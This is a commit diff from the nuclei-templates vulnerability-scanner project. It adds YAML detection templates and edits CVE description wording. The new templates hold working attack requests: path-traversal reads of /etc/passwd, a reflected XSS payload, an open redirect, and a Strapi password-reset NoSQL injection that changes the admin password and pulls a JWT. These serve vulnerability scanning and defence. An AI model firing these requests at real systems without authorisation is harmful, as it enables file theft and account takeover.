Merge pull request #89 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-09-08 17:37:15 +05:30 committed by GitHub
commit c4e1917f97
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
86 changed files with 1520 additions and 824 deletions

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 |
| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 |
| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 |
| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 |
| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | |
| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | |
| rce | 193 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | |
| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | |
| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | |
**147 directories, 1989 files**.
**150 directories, 2015 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 |
| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 |
| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 |
| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 |
| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | |
| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | |
| rce | 193 | gy741 | 72 | takeovers | 71 | | | | |
| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | |
| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | |
| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | |

View File

@ -4,7 +4,7 @@ info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: high
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
@ -33,4 +33,4 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
- "root:.*:0:0:"

View File

@ -2,7 +2,7 @@ id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216

View File

@ -0,0 +1,27 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1472
info:
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1473
info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1534
info:
name: Joomla! Component Shoutbox Pro - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12067
- https://www.cvedetails.com/cve/CVE-2010-1534
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1607
info:
name: Joomla! Component WMI 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-1956
info:
name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12285
- https://www.cvedetails.com/cve/CVE-2010-1956
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2010-2920
info:
name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12120
- https://www.cvedetails.com/cve/CVE-2010-2920
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -4,7 +4,7 @@ info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation,dwisiswant0,alex
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
tags: cve,cve2013,rce,struts,apache

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
author: suman_kar
severity: critical
description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
tags: cve,cve2016,iot,netgear,router
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
@ -32,4 +32,4 @@ requests:
part: body
group: 1
regex:
- '<b>Success "([a-z]+)"'
- '<b>Success "([a-z]+)"'

View File

@ -3,7 +3,7 @@ id: CVE-2017-15715
info:
name: Apache Arbitrary File Upload
author: geeknik
description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename.
description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
severity: high
tags: cve,cve2017,apache,httpd,fileupload
@ -42,4 +42,4 @@ requests:
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr_1}}")'
- 'contains(body_2, "{{randstr_1}}")'

View File

@ -4,7 +4,7 @@ info:
name: Graphite 'graphite.composer.views.send_email' SSRF
author: huowuzhao
severity: high
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008

View File

@ -0,0 +1,28 @@
id: CVE-2018-14064
info:
name: VelotiSmart Wifi - Directory Traversal
author: 0x_Akoko
severity: high
description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
reference:
- https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
- https://www.exploit-db.com/exploits/45030
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064
tags: cve,cve2018,lfi,camera,iot
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: CVE-2019-11013
info:
name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
author: 0x_Akoko
severity: high
reference:
- https://www.exploit-db.com/exploits/47301
- https://nvd.nist.gov/vuln/detail/CVE-2019-11013
tags: cve,cve2019,lfi,nimble
requests:
- method: GET
path:
- "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: divya_mudgal
severity: critical
reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameter to the /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
tags: cve,cve2019,sqli,lansweeper
requests:

View File

@ -4,7 +4,7 @@ info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
author: bp0lr
severity: high
description: An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability.
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
tags: cve,cve2019,webmin,rce

View File

@ -0,0 +1,46 @@
id: CVE-2019-18818
info:
name: Strapi CMS - Admin password reset (Unauthenticated)
author: idealphase
description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
severity: critical
tags: cve,cve2019,strapi,auth-bypass,intrusive
requests:
- raw:
- |
POST /admin/auth/reset-password HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"username":'
- '"email":'
- '"jwt":'
part: body
extractors:
- type: json
json:
- .user.username
- .user.email

View File

@ -4,7 +4,7 @@ info:
name: Oracle Business Intelligence - Publisher XXE
author: madrobot
severity: high
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
- https://www.exploit-db.com/exploits/46729

View File

@ -4,7 +4,7 @@ info:
name: YouPHPTube Encoder RCE
author: pikpikcu
severity: critical
description: A command injection have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
tags: cve,cve2019,rce

View File

@ -4,7 +4,7 @@ info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.
description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
reference:
- https://github.com/omarkurt/CVE-2019-5418
- https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/

View File

@ -0,0 +1,22 @@
id: CVE-2019-7275
info:
name: Open Redirect in Optergy Proton/Enterprise BMS
author: 0x_Akoko
severity: low
reference:
- https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
- https://applied-risk.com/resources/ar-2019-008
- https://cxsecurity.com/issue/WLB-2019110074
tags: cve,cve2019,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/updating.jsp?url=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

View File

@ -4,7 +4,7 @@ info:
name: GLPI v.9.4.6 - Open redirect
author: pikpikcu
severity: low
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6.
reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip

View File

@ -4,7 +4,7 @@ info:
name: Oracle WebLogic Server Administration Console Handle RCE
author: pdteam
severity: critical
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic

View File

@ -4,7 +4,7 @@ info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability.
reference:
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
@ -61,4 +61,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -4,7 +4,7 @@ info:
name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540)
author: geeknik
severity: medium
description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
reference: https://www.exploit-db.com/exploits/48812
tags: cve,cve2020,thinkadmin,lfi

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.
reference:
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

View File

@ -4,7 +4,7 @@ info:
name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/

View File

@ -4,7 +4,7 @@ info:
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
author: LogicalHunter
severity: high
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976

View File

@ -3,7 +3,7 @@ info:
name: UnRaid Remote Code Execution
author: madrobot
severity: high
description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code.
description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code.
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
tags: cve,cve2020,rce

View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: critical
tags: cve,cve2020,rce
description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2.
description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2.
reference:
- http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html
- http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html

View File

@ -2,7 +2,7 @@ id: CVE-2020-9402
info:
name: Django SQL Injection
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
reference:
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
- https://docs.djangoproject.com/en/3.0/releases/security/

View File

@ -3,7 +3,7 @@ info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
reference:
- https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
- https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9

View File

@ -0,0 +1,29 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files.
reference:
- https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true
- https://nvd.nist.gov/vuln/detail/CVE-2021-20114
tags: cve,cve2021,tcexam,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/cache/backup/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /cache/backup"
- "Parent Directory"
- ".sql.gz"
condition: and
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: dwisiswant0
severity: critical
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
tags: cve,cve2021,vmware,rce
requests:

View File

@ -4,7 +4,7 @@ info:
name: VICIdial - Multiple sensitive Information disclosure
author: pdteam
severity: high
description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21
description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021.
reference: https://github.com/JHHAX/VICIdial
tags: cve,cve2021

View File

@ -0,0 +1,32 @@
id: CVE-2021-29625
info:
name: Adminer reflected XSS via the table parameter
author: daffainfo
description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
severity: medium
reference:
- https://sourceforge.net/p/adminer/bugs-and-features/797/
- https://www.cvedetails.com/cve/CVE-2021-29625/
tags: cve,cve2021,adminer,xss
requests:
- method: GET
path:
- '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

View File

@ -3,7 +3,7 @@ id: CVE-2021-33221
info:
name: CommScope Ruckus IoT Controller Unauthenticated Service Details
author: geeknik
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
severity: medium
tags: cve,cve2021,commscope,ruckus,debug

View File

@ -6,6 +6,8 @@ info:
severity: medium
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
additional-fields:
shodan-dork: https://www.shodan.io/search?query=html%3A%22CS141%22
requests:
- raw:

